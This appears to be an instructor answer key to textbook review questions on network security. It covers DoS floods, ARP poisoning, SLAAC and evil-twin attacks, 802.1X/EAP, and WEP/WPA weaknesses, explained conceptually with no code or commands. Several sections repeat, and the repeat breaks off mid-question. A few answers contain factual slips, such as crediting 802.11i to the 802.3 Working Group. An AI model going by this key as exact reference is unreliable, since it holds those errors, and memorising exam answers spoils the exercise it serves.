4.1 Introduction
1. a) Explain the four general goals for secure networking.
These four goals include availability, confidentiality, functionality, and access control. Availability means that authorized users have access to information, services, and network resources. Confidentiality means preventing unauthorized users from gaining information about the network’s structure, data flowing across the network, network protocols used, or packet header values. Functionality means preventing attackers from altering the capabilities or operation of the network. Access control is the policy-driven control of access to systems, data, and dialogues.
b) How can information be gathered from encrypted network traffic?
Information transmitted during an SSL session cannot be viewed. However, the sender’s IP address, receiver’s IP address, the DNS request to resolve the hostname, the port numbers used, and the quantity of data sent are all visible. Even if the traffic is encrypted the attacker can still see which sites are visited, how much data is sent or received, and which port numbers are used.
c) Give an example of how new technology has made networks less secure.
Answers will vary. For example, newer cell phones have the ability to allow wireless laptops to tether themselves to the cell phone and share their Internet connectivity. Allowing cell phones into the corporate network completely circumvents access control procedures, firewalls, antivirus protection, data loss prevention systems, and so on.
d) How does the castle model relate to secure networking?
The traditional castle model of network defense had the good guys on the inside, and the attackers on the outside. There was a well-guarded single point of entry. All network administrators had to do was secure this point of entry and attackers would be stopped.
e) What is meant by “death of the perimeter?”
The “death of the perimeter” is a phrase used by network administrators to convey the idea that creating a 100 percent secure network is impossible. They argue that it is impractical, if not impossible, to force all information in an organization through a single point in the network.
f) How does the city model relate to secure networking?
The city model has no distinct perimeter, and there are multiple ways of entering the network. Like a real city, who you are will determine which buildings you will be able to access. In technical terms, this will mean more internal intrusion detection systems, virtual LANs, central authentication servers, and encrypted internal traffic.
4.2 Denial-of-Service (DoS) Attacks
2. a) What is a denial-of-service attack?
A DoS attack attempts to make a server or network unavailable to legitimate users. In terms of the general goals discussed earlier, DoS attacks are ways of reducing availability.
b) Other than a DoS attack, what could cause a company’s webserver crash?
Faulty coding, or referrals from large sites.
c) What are the main goals of DoS attacks?
The ultimate goal of a DoS attack is to cause harm. For corporations, this can come in the form of losses related to online sales, industry reputation, employee productivity, or customer loyalty. DoS attacks can cause harm by (1) stopping a critical service, or (2) slowly degrading services over time.
d) Is a slow degradation of service worse than a total stoppage? Why?
An attack that slowly degrades services is more difficult to detect because there isn’t an abrupt change in service quality. Network administrators cannot see a clear distinction between genuine growth in network traffic and a progressive DoS attack. They may be forced into unnecessary capital expenditures for additional bandwidth, hardware, and software.
Methods of DoS Attacks
Direct and Indirect Attacks
3. a) What is the difference between a direct and indirect DoS attack?
A direct attack occurs when an attacker tries to flood a victim with a stream of packets directly from the attacker’s computer. An indirect attack tries to flood the victim computer in the same way, but the attacker’s IP address is spoofed (i.e., faked) and the attack appears to come from another computer.
b) What is backscatter?
Backscatter occurs when a victim sends responses to the spoofed IP address used by the attacker, and inadvertently floods an unintended victim.
c) What types of packets can be sent as part of a DoS attack?
A few of the types of packets that could be sent in a DoS attack include SYN, ICMP, and HTTP.
d) Describe a SYN flood.
A SYN flood, or half-open TCP attack, happens when the attacker sends a large number of TCP SYN segments to the victim server. Each SYN begins a TCP session opening process on the server. The server sets aside RAM and other resources for the connection. The server then sends back a SYN/ACK segment. The attacker never completes the connection opening by sending a final ACK. As the attacker sends more SYN segments, the victim host keeps setting aside resources until it crashes or refuses to provide any more connections, even to legitimate users.
e) How does a DDoS attack work?
DDoS attacks are the most common form of DoS attack that uses intermediaries to attack the victim. The attacker’s identity can be hidden behind layers of bots which directly attack the victim. Second, the ability to control thousands of bots can give the attacker the resources needed to overwhelm the victim.
f) What does a handler do?
Handlers are an additional layer of compromised hosts that are used to manage large groups of bots. Handlers can direct bots to send a variety of different packets depending on the service being targeted.
Reflected Attack
4. a) How does a P2P redirect attack work?
A peer-to-peer (P2P) redirect attack uses many hosts to overwhelm a victim using normal P2P traffic (Figure 4-7, Step 1). A P2P redirect attack differs from a traditional DDoS attack in several ways. The attacker does not have to control each of the hosts (i.e., make them bots) used to attack the victim. The attacker just needs to convince the hosts to redirect their legitimate P2P traffic (Step 2) from the P2P server to the victim (Step 3).
b) How does a reflected attack work?
A reflected attack uses responses from legitimate services to flood a victim. The attacker sends spoofed requests to existing legitimate servers (Step 1). Servers then send all responses to the victim (Step 2). There is no redirection of traffic.
c) What is a DRDoS attack, and how does it work?
Using a botnet in a reflected attack using legitimate services is known as a distributed reflected denial-of-service (DRDoS) attack.
d) What is a Smurf flood?
A Smurf flood is a variation of a reflected attack that takes advantage of an incorrectly configured network device (router) to flood a victim. The attacker sends a spoofed ICMP echo request to a network device (Step 1) that has broadcasting enabled to all internal hosts. The network device forwards the echo request to all internal hosts (Step 2). All internal hosts respond to the spoofed ICMP echo request (Step 3) and the victim is flooded.
e) What type of packet is sent in a Smurf flood? Why?
ICMP, the attacker benefits from a multiplier effect because a single ICMP request is responded to by multiple hosts (Step 4).
f) How could a malformed packet cause a host to crash?
An attacker could send a malformed packet that will cause the victim to crash. For example, ping of death is a well-known older attack that uses an illegally large IP packet to crash the victim’s operating system.
Defending Against Denial-of-Service (DoS) Attacks
5. a) What is black holing?
Black holing is when a firm drops all IP packets from an attacker.
b) Is black holing an effective defense against DoS attacks? Why?
Black holing an attacker is not a good long-term strategy because attackers can quickly change source IP addresses.
c) How can the effects of SYN floods be mitigated?
The effects of SYN floods can be mitigated by validating the TCP handshake, rate limiting, or even black-holing.
d) What is a false opening?
False opens occur when a SYN segment arrives, the firewall itself sends back a SYN/ACK segment, without passing the SYN segment on to the target server.
e) Why is rate limiting a good way to reduce the damage of some DoS attacks?
Rate limiting can be used to reduce a certain type of traffic to a reasonable amount. This is good if an attack is aimed at a single server because it keeps transmission lines at least partially open for other communication
f) Why is it limited in effectiveness?
Rate limiting frustrates both attackers and legitimate users. It helps, but it does not solve the problem.
g) Why is DoS protection a community problem, not just a problem for individual victim firms to solve?
DoS attacks are community problems that can only be stopped with the help of ISPs and organizations whose computers are taken over as bots and used to attack other firms. DoS attacks may unintentionally originate from an unsuspecting firm. Working together firms can stop attacks from leaving their organizations, before they even reach their target.
4.3 ARP Poisoning
Normal ARP Operation
6. a) Why do hosts use ARP?
Address Resolution Protocol (ARP) is used to resolve 32-bit IP addresses (e.g., 55.91.56.21) into 48-bit local MAC addresses (e.g., 01-1C-23-0E-1D-41). Hosts on the same network must know each other’s MAC addresses before they can send and receive packets using IP addresses. Hosts build ARP tables by sending ARP requests and replies to each other.
b) Can ARP poisoning be used outside the LAN? Why not?
Typically not. Packets with IP addresses not on that LAN are redirected out of the network. ARP requests are only sent on the LAN.
c) Why do hosts send ARP requests?
If a host (gateway) receives a packet addressed to an internal host (10.0.0.1) it sends an ARP request to every host on the LAN asking if they have that IP address (Step 1). Only the host that has the requested IP address responds. All other hosts ignore the request (Step 2). Thus, hosts use ARP requests to resolve IP addresses into MAC addresses.
d) What is ARP spoofing?
ARP spoofing uses false ARP replies to map any IP address to any MAC address. Spoofed ARP replies can be broadcast to other hosts on the LAN.
e) How could an attacker use ARP spoofing to manipulate host ARP tables?
ARP requests and replies do not require authentication or verification. All hosts trust all ARP replies. Spoofed ARP replies are broadcast to other hosts on the LAN. This allows an attacker to manipulate ARP tables on all LAN hosts.
ARP Poisoning
7. a) Explain ARP poisoning?
ARP poisoning can be used to reroute traffic for a MITM attack by sending unsolicited false ARP replies to all other hosts. An attacker can force hosts to erroneously mismatch MAC addresses and IP address. Essentially, the attacker can reroute all internal traffic as desired.
b) Why does the attacker have to send a continuous stream of unrequested ARP replies?
The attacker must send a continuous stream of unsolicited ARP replies to all hosts on the LAN. Otherwise, all hosts would quickly resolve the true MAC addresses of all other hosts on the network.
c) Do switches record IP addresses? Why not?
Switches only look at MAC addresses. They cannot identify the incorrect ARP resolution being pushed out to all other hosts. They merely forward all packets based on MAC address. They do not look at the IP address on the packet.
d) Does the attacker have to poison the gateway’s ARP tables too? Why?
Yes, after the attacker has successfully rerouted host traffic, it needs to reroute the traffic coming to, and from, the gateway. It uses a similar spoofed ARP reply to poison the gateway. The attacker sends a continuous stream of spoofed ARP replies to the gateway telling it that all other internal hosts are at C3-C3-C3-C3-C3-C3 (Step 3).
e) Why does all network traffic go through the attacker after poisoning the network?
If the attacker has successfully used spoofed ARP replies to record false entries in the ARP tables for all internal hosts and the gateway. All traffic sent from internal hosts to the gateway will go to the attacker (Step 4). All traffic from the gateway will also go through the attacker and is now redirected through his computer as part of a MITM attack (Step 5).
ARP DoS Attack
Preventing ARP Poisoning
8. a) How can ARP poisoning be used as a DoS attack?
Spoofed ARP replies can be used to stop all traffic on the local network as part of an ARP DoS attack. The attacker sends all internal hosts a continuous stream of unsolicited spoofed ARP replies saying the gateway (10.0.0.4) is at E5-E5-E5-E5-E5-E5 (Step 1). Hosts record the gateway’s IP address and nonexistent MAC address (Step 2).
b) How can static IP and ARP tables be used to prevent ARP poisoning?
ARP poisoning can be prevented by using static IP tables and static ARP tables. Static ARP tables are manually set and cannot be dynamically updated using ARP. Each computer has a known static IP address that does not change. All hosts on the LAN know which IP address is assigned to each MAC address (host).
c) Can static IP and ARP tables be effectively used in large networks? Why not?
Most organizations are too large, change too quickly, and lack the experience to effectively manage static IP and ARP tables. The workload would be overwhelming.
d) Why would limiting local access prevent DoS attacks?
Limiting local access would prevent ARP DoS attacks because foreign hosts would not be able to send packets to internal hosts.
SLAAC Attack
9. a) What is a SLAAC attack?
A Stateless Address Auto Configuration (SLAAC) attack is an attack on the functionality and confidentiality of a network. This attack occurs when a rogue IPv6 router is introduced to an IPv4 network. All traffic is automatically rerouted through the IPv6 router, creating the potential for a MITM attack.
b) Why do host automatically prefer IPv6 addressing?
Traffic on the existing IPv4 network is rerouted through the rogue IPv6 router because all newer operating systems are configured by default to prefer IPv6 networks. Microsoft Windows 7, Microsoft Server 2008, and Apple OS X all ship with IPv6 fully enabled.
c) What has to be introduced to a network for a SLAAC attack to work?
With the physical introduction of a rogue IPv6 router all internal traffic is automatically rerouted (Step 1). This happens because the rogue router advertises its presence on the network using Router Advertisement (RA) messages over ICMPv6 (Step 2). Hosts receive RAs and automatically derive their IPv6 address using a process called Stateless Address Auto Configuration (SLAAC).
d) Would a SLAAC attack work on an existing IPv6 network? Why not?
No, the attack would only work on existing IPv4 networks. If the attack were tried on an existing IPv6 network the network administrator would immediately see conflicts. The network administrator could also assign a specific (legitimate) internal DHCP server (IPv6) to each host.
e) Could a rogue router direct internal traffic to an outside rogue DNS server? How?
Yes, the rogue router can assign a false DNS server to internal hosts as part of the SLAAC attack. A false DNS server would allow an attacker to redirect all internal traffic to any number of phishing sites.
4.4 Access Control for Networks
LAN Connections
10. a) What is the main access threat to Ethernet LANs?
Traditionally, Ethernet LANs offered no access security. Any intruder who entered a corporate building could walk up to any wall jack and plug in a notebook computer. The intruder would then have unfettered access to the LAN’s computers, bypassing the site’s border firewall. This was a complete breakdown in access control.
b) What is the main access threat to 802.11 wireless LANs?
An intruder can connect by radio to an unprotected wireless access point.
c) Why is the access threat to WLANs more severe?
The intruder does not even have to enter the building as he or she needs to do in wired LANs. In WLANs, attackers can connect to unprotected (or poorly protected) wireless access points and bypass border router security from outside of the physical premises of the company.
d) Is eavesdropping usually more of a concern for wired LANs, wireless LANs, or both?
It is a concern in both, but it is a rare concern in wired LANs and a common concern with wireless LANs.
4.5 Ethernet Security
Ethernet and 802.1X
11. a) Why is 802.1X called Port-Based Access Control?
802.1X is called port-based access control because security is implemented on specific ports of an Ethernet workgroup switch.
b) Where is the heavy authentication work done?
The heavy authentication work is done on a central authentication server, rather than on the switch.
c) What are the three benefits of using a central authentication server?
Reduced cost: Having a central authentication server reduces the work required to maintain multiple authentication databases updated, as well as reduces the authentication processing on individual switches.
Consistency: Credentials are checked against the same authentication database every time, versus relying on possibly outdated authentication databases residing on switches throughout the network.
Immediacy: Central authentication allows the ability to rapidly change access controls, especially important when trying to restrict access to a recently fired employee or rogue PC that may be negatively impacting the network.
d) Which device is the verifier? Explain. (Trick question.)
There is no verifier in 802.1X. Instead, the verifier responsibilities are shared between the workgroup switch, known as the authenticator, and the central authentication server.
e) Which device is called the authenticator?
The workgroup switch is called the authenticator.
The Extensible Authentication Protocol (EAP)
12. a) How does an EAP session start?
When a switch senses a connection, it sends an EAP Start message to the RADIUS server. This begins the EAP session.
b) What types of messages carry requests for authentication information and responses to these requests?
EAP request and response messages.
c) Describe how the central authentication server tells the authenticator that the supplicant is acceptable.
It sends an EAP accept message if the supplicant is acceptable, but it sends an EAP failure message if the supplicant is not.
d) How does the authenticator pass this information on to the supplicant?
How the authenticator notifies the client of authentication success or failure is outside the scope of EAP.
e) In what sense is EAP extensible?
EAP is considered extensible because it is easy to add new authentication methods to EAP (such as smart cards, MS-CHAP, Diffie–Helman, etc.) without modification of the general format of the underlying EAP messages, just the contents are modified by the authentication method chosen.
f) When a new authentication method is added, what device software must be changed to use the new method?
When a new authentication method is added, the central authentication server and supplicant both need to implement the new method.
g) Why is there no need to change the operation of the authenticator when a new EAP authentication method is added, or an old EAP authentication mode is dropped?
The software on the authenticator (workgroup switch) does not have to be changed. It merely passes request and response messages through. This is good because a network will have many workgroup switches.
h) Why is this freedom from the need to make changes in the switch beneficial?
The freedom to make changes in authentication protocols is beneficial because it reduces costs that would normally be associated with upgrading authenticators if they were tied to specific authentication methods.
RADIUS Servers
13. a) What standard do most central authentication servers follow?
Most central authentication servers are governed by the RADIUS standard.
b) How are EAP and RADIUS related in terms of functionality?
RADIUS is an AAA server that uses EAP for authentication.
c) What authentication method does RADIUS use?
EAP
4.6 Wireless Security
Wireless Attacks
14. a) What is the most common attack against wireless networks? Why?
The most common attack against wireless networks is unauthorized access, or connecting to a network without permission.
b) Which IEEE standard governs WLAN transmission?
IEEE 802.11.
c) Which device acts as a relay between wired and wireless networks?
An access point.
d) What is the typical range of a WLAN?
Wireless 802.11 networks typically have a range of 30 to 100 meters extending in all directions from the AP.
e) What is the difference between an open network and a private network?
Open networks can be legally accessed by anyone, but private networks that do not allow access unless specifically authorized.
f) Who would set up a rogue access point? Why?
Rogue access points are unauthorized access points set up by individuals or departments with little or no security. They are typically set up by internal employees for convenience, without knowing the ramifications of an unsecured wireless AP.
g) Give examples of both internal and external harm caused by unauthorized wireless access.
Internally, attackers have greater access to internal information, resources, and other network traffic. They can covertly steal confidential information, read and record network traffic, alter network devices, or plant malware on targeted clients or servers. They may also have access to network shares that were assumed to be protected behind the firewall.
An attacker could anonymously download, upload, and store illegal content via the wireless network. Even worse, the network could be used as a launching pad for an external attack.
h) Are you liable if someone else uses your wireless network to commit a crime? Why, or why not?
At the time of this writing, it appears that you are likely not liable for crimes committed by criminals using your wireless network—if you attempted to secure it. However, it’s unknown if you could be liable for criminal acts performed through an unprotected network. In either case, your ISP can immediately discontinue your service.
Evil Twin Access Points
15. a) What man-in-the-middle attack is a danger for 802.11 WLANs?
The most dangerous man-in-the-middle attack for 802.11 WLANs is the evil twin access point. An evil twin access point is simply a PC that has software that allows it to masquerade as a legitimate access point. The evil twin will pass traffic to legitimate access points transparently, retaining copies of important data sent from the host and legitimate access point. Evil twin access points can intercept messages during and after security setup, allowing the evil twin to have the necessary keys to decrypt all traffic during a specific session.
b) Physically, what is an evil twin access point?
An evil twin access point is simply a PC that has software to allow it to masquerade as an access point.
c) What happens when the legitimate supplicant sends credentials to the legitimate access point?
The evil twin access point will intercept all traffic passing through it, including credentials and keys which will later on give it permission to decrypt and encrypt any messages passing through.
d) In what two types of attacks can the evil twin engage?
It can capture credentials transmissions and keys and it can also send packets of its own impersonating the victim client.
e) Are evil twin attacks frequent?
Yes
f) Where are they the most frequently encountered?
In public hot spots.
g) How can the danger of evil twin attacks be addressed?
The danger of evil twin attacks can be eliminated by requiring remote clients to establish VPN connections with VPN gateways prior to gaining access to network resources. Remote access VPN connection setup requires a pre-shared key on the client and VPN gateway, and this pre-shared key is never transmitted during authentication, thus defeating the evil twin’s ability to copy credentials and keying information.
Wireless Denial of Service
16. a) How would a wireless DoS attack be carried out?
Wireless DoS attacks can be carried out by 1) flooding the frequency being used, 2) flooding the AP with too many packets, and 3) continually sending “disassociate” packets to all internal wireless clients.
b) What type of devices could be used to flood the transmission frequency for a WLAN?
Attackers can use common household items such as baby monitors, cordless phones, or Bluetooth devices to interfere with an 802.11 network. Attackers can also use commercial jamming devices.
c) What device could be used to identify a DoS flood if the entire frequency is being flooded by EMI?
Network administrators can use wireless spectrum analyzers to identify DoS floods. Spectrum analyzers record all signals, including packet transmissions, within a given radio frequency band.
d) What type of attack commands could be sent to cause a wireless DoS attack?
An Attacker could use packet injection to send spoofed deauthenticate messages to the AP. The spoofed source addresses would correspond to each wireless client on the WLAN. The deauthenticate message says that the sender wants to terminate the authenticated connection. The victim must reauthenticate with the AP before it can communicate.
e) What would happen if a wireless network were flooded with CTS frames?
A flood of CTS frames with long transmission durations keeps other clients waiting. A flood of RTS frames produces a flood of CTS frames. Both produce an effective DoS attack on the wireless network. Again, these messages are not authenticated.
Wireless LAN Security with 802.11i
17. a) Why is it impossible to extend 802.1X operation using EAP directly to WLANs?
EAP assumes that the connection between the supplicant and authenticator is secure, which is not the case in wireless transmission. Thus, 802.1X operation using EAP cannot be directly extended to WLANs.
b) What standard did the 802.3 Working Group create to extend 802.1X operation to WLANs with security for EAP?
802.11i
c) For 802.11i, distinguish between outer and inner authentication.
Outer authentication in 802.11i consists of the client authenticating itself to the access point by establishing an SSL/TSL connection. Inner authentication follows outer authentication and occurs when the wireless client authentications itself with the central authentication server using EAP, within the protection of SSL/TLS.
d) What authentication method or methods does outer authentication use?
Outer authentication uses SSL/TSL.
e) What two extended EAP protocols are popular today?
EAP/TLS and PEAP.
f) Distinguish between their options for inner authentication.
For EAP/TLS, the inner authentication also uses TLS. For PEAP, the client can use any method specified in the EAP standard, ranging from passwords through digital certificates.
g) Is 802.11i security strong? Explain.
802.11i security is very strong. 802.11i not only provides authentication, but it supplies all of the protections expected in a strong cryptographic security system. By using 128bit AES, 802.11i ensures a robust symmetric encryption cipher for confidentiality. 802.11i also uses the strong AES-CCMP standard for automatic and frequent rekeying.
Core Wireless Security Protocols
Wired Equivalent Privacy (WEP)
18. a) What was the first core wireless security standard?
Wired equivalent privacy (WEP).
b) What encryption algorithm does it use?
WEP uses RC4.
c) Why are permanent shared keys undesirable?
Permanent shared keys are undesirable because in large firms that have many access points sharing the same WEP key, the practical difficulties in changing everyone’s key means that shared keys are almost never changed. In addition, because “everybody knows” the key, people share the key freely even when they are told not to. Worst of all, if a company fires a disgruntled employee, it must change the key on every access point for which the employee may know the key. In many cases, changing the key will be prohibitively expensive and would inconvenience many workers.
d) What per-frame key does a WEP computer or access point use to encrypt when it transmits?
WEP encrypts each frame with a per-frame key that consists of the shared RC4 key plus a 24-bit initialization vector (IV) that is different for each frame.
e) What mistake did the 802.11 Working Group make in selecting the length of the IV?
The 802.11 Working Group’s mistake was making IVs too short (only 24 bits long).
f) How long may WEP take to crack today?
If a company encrypts a large enough volume of traffic with the same secret key, the attacker can often compute the entire secret key in two or three minutes.
g) Should corporations today use WEP for security today?
No. Given how easily and quickly WEP can be cracked, it makes no sense for corporations to use WEP today. In fact, it only gives a false sense of security, and this may be worse than no security at all.
Wi-Fi Protected Access (WPA™)
19. a) What prompted the Wi-Fi Alliance to create WPA?
The inadequacy of WEP (which can be cracked in minutes) caused many companies to freeze WLAN deployment and in some cases turn off existing WLANs. This wide scale lack of trust in WLAN security prompted the Wi-Fi Alliance to create WPA.
b) Compare WPA and 802.11i security.
WPA uses the relatively weak RC4 cipher in encryption for confidentiality and uses the only moderately strong Temporal Key Integrity Protocol (TKIP) for keying and rekeying. Although there have been no published cracks for WPA as a whole, at least at the time of this writing, TKIP has been partially cracked, and security professionals are uncomfortable with WPA’s security methods.
c) What does the Wi-Fi Alliance call 802.11i?
WPA2
d) Despite its relatively security weaknesses, why do many companies continue to use WPA instead of 802.11i?
Companies still use WPA instead of WPA2 to avoid the cost of reconfiguring all access points and wireless clients to support WPA2.
Pre-Shared Key (PSK) Mode
20. a) Why is 802.1X mode unsuitable for homes and small offices?
Because the use of a central authentication server is very expensive.
b) What mode was created for homes or very small businesses with a single access point?
PSK/personal mode
c) How do users in this mode authenticate themselves to the access point?
In the PSK mode, users authenticate themselves to the access point via the use of a single, shared initial key.
d) Why is using a shared initial key not dangerous?
This key is used only briefly—when a client first authenticates itself to the access point. The access point sends the client a session key for use during the session. With only a few messages transmitted using the shared initial key, it is impossible for a cryptanalyst to discover the shared initial key.
e) How are PSK/personal keys generated?
The administrator types a passphrase into every client and into the access point.
f) How long must passphrases be for adequate security?
Passphrases must be at least 20 characters long for adequate security, but preferably greater than 20 characters.
Wireless Intrusion Detection Systems
21. a) What is the purpose of a wireless IDS?
It is to collect data from wireless access points that can be used to detect attacks.
b) How do wireless IDSs get their data?
In a centralized wireless intrusion detection system, each access point becomes a wireless IDS agent, sending appropriate information to the central wireless IDS console. The console transfers the data to an IDS database. It also sorts through data in the database to find indications of problems.
c) What is a rogue access point?
Unauthorized access points set up by individuals or departments.
d) What are the two alternatives to using a centralized wireless IDS?
One is not to worry about intrusion detection and the other is to walk around the building frequently with a laptop that has wireless IDS software.
e) Why are they not attractive?
Ignoring threats raises the probability that they will be successful. Walking around is likely to require a prohibitive amount of labor, and it cannot catch threats that appear after the wireless security administrator has checked a part of the site for threats. Nor are they likely to catch evil twin access points, which only operate occasionally and so may not be operating when the wireless administrator is sweeping the building for concerns.
False 802.11 Security Measures
22. a) Does the use of spread spectrum transmission in 802.11 create security?
No. Military transmission uses spread spectrum operation in a way that provides security. Civilian spread spectrum transmission does not.
b) What are SSIDs?
Each access point has a Service Set Identifier (SSID) that acts as the access point’s address. Clients must know the SSID to connect to the access point.
c) Does turning off SSID broadcasting offer real security? Explain.
No. Turning off SSID broadcasting would seem to offer security. However, even if SSID broadcasting is turned off, the SSID will still be transmitted in the clear in the header of each transmitted frame. Hacker software can read the SSID easily.
d) What are MAC access control lists?
A MAC access control list is a list of pre-approved stations allowed to use the access point.
e) Do they offer real security? Explain. MAC access control lists rely on MAC addresses that are transmitted in the clear for every 802.11 frame. MAC addresses can be sniffed and spoofed by hackers. Thus, MAC access control lists offer no significant security.
1. a) Explain the four general goals for secure networking.
These four goals include availability, confidentiality, functionality, and access control.
Availability means that authorized users have access to information, services, and network resources.
Confidentiality means preventing unauthorized users from gaining information about the network’s structure, data flowing across the network, network protocols used, or packet header values.
Functionality means preventing attackers from altering the capabilities or operation of the network.
Access control is the policy-driven control of access to systems, data, and dialogues.
b) How can information be gathered from encrypted network traffic?
Information transmitted during an SSL session cannot be viewed. However, the sender’s IP address, receiver’s IP address, the DNS request to resolve the hostname, the port numbers used, and the quantity of data sent are all visible. Even if the traffic is encrypted the attacker can still see which sites are visited, how much data is sent or received, and which port numbers are used.
c) Give an example of how new technology has made networks less secure.
Answers will vary. For example, newer cell phones have the ability to allow wireless laptops to tether themselves to the cell phone and share their Internet connectivity. Allowing cell phones into the corporate network completely circumvents access control procedures, firewalls, antivirus protection, data loss prevention systems, and so on.
d) How does the castle model relate to secure networking?
The traditional castle model of network defense had the good guys on the inside, and the attackers on the outside. There was a well-guarded single point of entry. All network administrators had to do was secure this point of entry and attackers would be stopped.
e) What is meant by “death of the perimeter?”
The “death of the perimeter” is a phrase used by network administrators to convey the idea that creating a 100 percent secure network is impossible. They argue that it is impractical, if not impossible, to force all information in an organization through a single point in the network.
f) How does the city model relate to secure networking?
The city model has no distinct perimeter, and there are multiple ways of entering the network. Like a real city, who you are will determine which buildings you will be able to access. In technical terms, this will mean more internal intrusion detection systems, virtual LANs, central authentication servers, and encrypted internal traffic.
4.2 Denial-of-Service (DoS) Attacks
2. a) What is a denial-of-service attack?
A DoS attack attempts to make a server or network unavailable to legitimate users. In terms of the general goals discussed earlier, DoS attacks are ways of reducing availability.
b) Other than a DoS attack, what could cause a company’s webserver crash?
Faulty coding, or referrals from large sites.
c) What are the main goals of DoS attacks?
The ultimate goal of a DoS attack is to cause harm. For corporations, this can come in the form of losses related to online sales, industry reputation, employee productivity, or customer loyalty. DoS attacks can cause harm by (1) stopping a critical service, or (2) slowly degrading services over time.
d) Is a slow degradation of service worse than a total stoppage? Why?
An attack that slowly degrades services is more difficult to detect because there isn’t an abrupt change in service quality. Network administrators cannot see a clear distinction between genuine growth in network traffic and a progressive DoS attack. They may be forced into unnecessary capital expenditures for additional bandwidth, hardware, and software.
Methods of DoS Attacks
Direct and Indirect Attacks
3. a) What is the difference between a direct and indirect DoS attack?
A direct attack occurs when an attacker tries to flood a victim with a stream of packets directly from the attacker’s computer. An indirect attack tries to flood the victim computer in the same way, but the attacker’s IP address is spoofed (i.e., faked) and the attack appears to come from another computer.
b) What is backscatter?
Backscatter occurs when a victim sends responses to the spoofed IP address used by the attacker, and inadvertently floods an unintended victim.
c) What types of packets can be sent as part of a DoS attack?
A few of the types of packets that could be sent in a DoS attack include SYN, ICMP, and HTTP.
d) Describe a SYN flood.
A SYN flood, or half-open TCP attack, happens when the attacker sends a large number of TCP SYN segments to the victim server. Each SYN begins a TCP session opening process on the server. The server sets aside RAM and other resources for the connection. The server then sends back a SYN/ACK segment. The attacker never completes the connection opening by sending a final ACK. As the attacker sends more SYN segments, the victim host keeps setting aside resources until it crashes or refuses to provide any more connections, even to legitimate users.
e) How does a DDoS attack work?
DDoS attacks are the most common form of DoS attack that uses intermediaries to attack the victim. The attacker’s identity can be hidden behind layers of bots which directly attack the victim. Second, the ability to control thousands of bots can give the attacker the resources needed to overwhelm the victim.
f) What does a handler do?
Handlers are an additional layer of compromised hosts that are used to manage large groups of bots. Handlers can direct bots to send a variety of different packets depending on the service being targeted.
Reflected Attack
4. a) How does a P2P redirect attack work?
A peer-to-peer (P2P) redirect attack uses many hosts to overwhelm a victim using normal P2P traffic (Figure 4-7, Step 1). A P2P redirect attack differs from a traditional DDoS attack in several ways. The attacker does not have to control each of the hosts (i.e., make them bots) used to attack the victim. The attacker just needs to convince the hosts to redirect their legitimate P2P traffic (Step 2) from the P2P server to the victim (Step 3).
b) How does a reflected attack work?
A reflected attack uses responses from legitimate services to flood a victim. The attacker sends spoofed requests to existing legitimate servers (Step 1). Servers then send all responses to the victim (Step 2). There is no redirection of traffic.
c) What is a DRDoS attack, and how does it work?
Using a botnet in a reflected attack using legitimate services is known as a distributed reflected denial-of-service (DRDoS) attack.
d) What is a Smurf flood?
A Smurf flood is a variation of a reflected attack that takes advantage of an incorrectly configured network device (router) to flood a victim. The attacker sends a spoofed ICMP echo request to a network device (Step 1) that has broadcasting enabled to all internal hosts. The network device forwards the echo request to all internal hosts (Step 2). All internal hosts respond to the spoofed ICMP echo request (Step 3) and the victim is flooded.
e) What type of packet is sent in a Smurf flood? Why?
ICMP, the attacker benefits from a multiplier effect because a single ICMP request is responded to by multiple hosts (Step 4).
f) How could a malformed packet cause a host to crash?
An attacker could send a malformed packet that will cause the victim to crash. For example, ping of death is a well-known older attack that uses an illegally large IP packet to crash the victim’s operating system.
Defending Against Denial-of-Service (DoS) Attacks
5. a) What is black holing?
Black holing is when a firm drops all IP packets from an attacker.
b) Is black holing an effective defense against DoS attacks? Why?
Black holing an attacker is not a good long-term strategy because attackers can quickly change source IP addresses.
c) How can the effects of SYN floods be mitigated?
The effects of SYN floods can be mitigated by validating the TCP handshake, rate limiting, or even black-holing.
d) What is a false opening?
False opens occur when a SYN segment arrives, the firewall itself sends back a SYN/ACK segment, without passing the SYN segment on to the target server.
e) Why is rate limiting a good way to reduce the damage of some DoS attacks?
Rate limiting can be used to reduce a certain type of traffic to a reasonable amount. This is good if an attack is aimed at a single server because it keeps transmission lines at least partially open for other communication
f) Why is it limited in effectiveness?
Rate limiting frustrates both attackers and legitimate users. It helps, but it does not solve the problem.
g) Why is DoS protection a community problem, not just a problem for individual victim firms to solve?
DoS attacks are community problems that can only be stopped with the help of ISPs and organizations whose computers are taken over as bots and used to attack other firms. DoS attacks may unintentionally originate from an unsuspecting firm. Working together firms can stop attacks from leaving their organizations, before they even reach their target.
4.3 ARP Poisoning
Normal ARP Operation
6. a) Why do hosts use ARP?
Address Resolution Protocol (ARP) is used to resolve 32-bit IP addresses (e.g., 55.91.56.21) into 48-bit local MAC addresses (e.g., 01-1C-23-0E-1D-41). Hosts on the same network must know each other’s MAC addresses before they can send and receive packets using IP addresses. Hosts build ARP tables by sending ARP requests and replies to each other.
b) Can ARP poisoning be used outside the LAN? Why not?
Typically not. Packets with IP addresses not on that LAN are redirected out of the network. ARP requests are only sent on the LAN.
c) Why do hosts send ARP requests?
If a host (gateway) receives a packet addressed to an internal host (10.0.0.1) it sends an ARP request to every host on the LAN asking if they have that IP address (Step 1). Only the host that has the requested IP address responds. All other hosts ignore the request (Step 2). Thus, hosts use ARP requests to resolve IP addresses into MAC addresses.
d) What is ARP spoofing?
ARP spoofing uses false ARP replies to map any IP address to any MAC address. Spoofed ARP replies can be broadcast to other hosts on the LAN.
e) How could an attacker use ARP spoofing to manipulate host ARP tables?
ARP requests and replies do not require authentication or verification. All hosts trust all ARP replies. Spoofed ARP replies are broadcast to other hosts on the LAN. This allows an attacker to manipulate ARP tables on all LAN hosts.
ARP Poisoning
7. a) Explain ARP poisoning?
ARP poisoning can be used to reroute traffic for a MITM attack by sending unsolicited false ARP replies to all other hosts. An attacker can force hosts to erroneously mismatch MAC addresses and IP address. Essentially, the attacker can reroute all internal traffic as desired.
b) Why does the attacker have to send a continuous stream of unrequested ARP replies?
The attacker must send a continuous stream of unsolicited ARP replies to all hosts on the LAN. Otherwise, all hosts would quickly resolve the true MAC addresses of all other hosts on the network.
c) Do switches record IP addresses? Why not?
Switches only look at MAC addresses. They cannot identify the incorrect ARP resolution being pushed out to all other hosts. They merely forward all packets based on MAC address. They do not look at the IP address on the packet.
d) Does the attacker have to poison the gateway’s ARP tables too? Why?
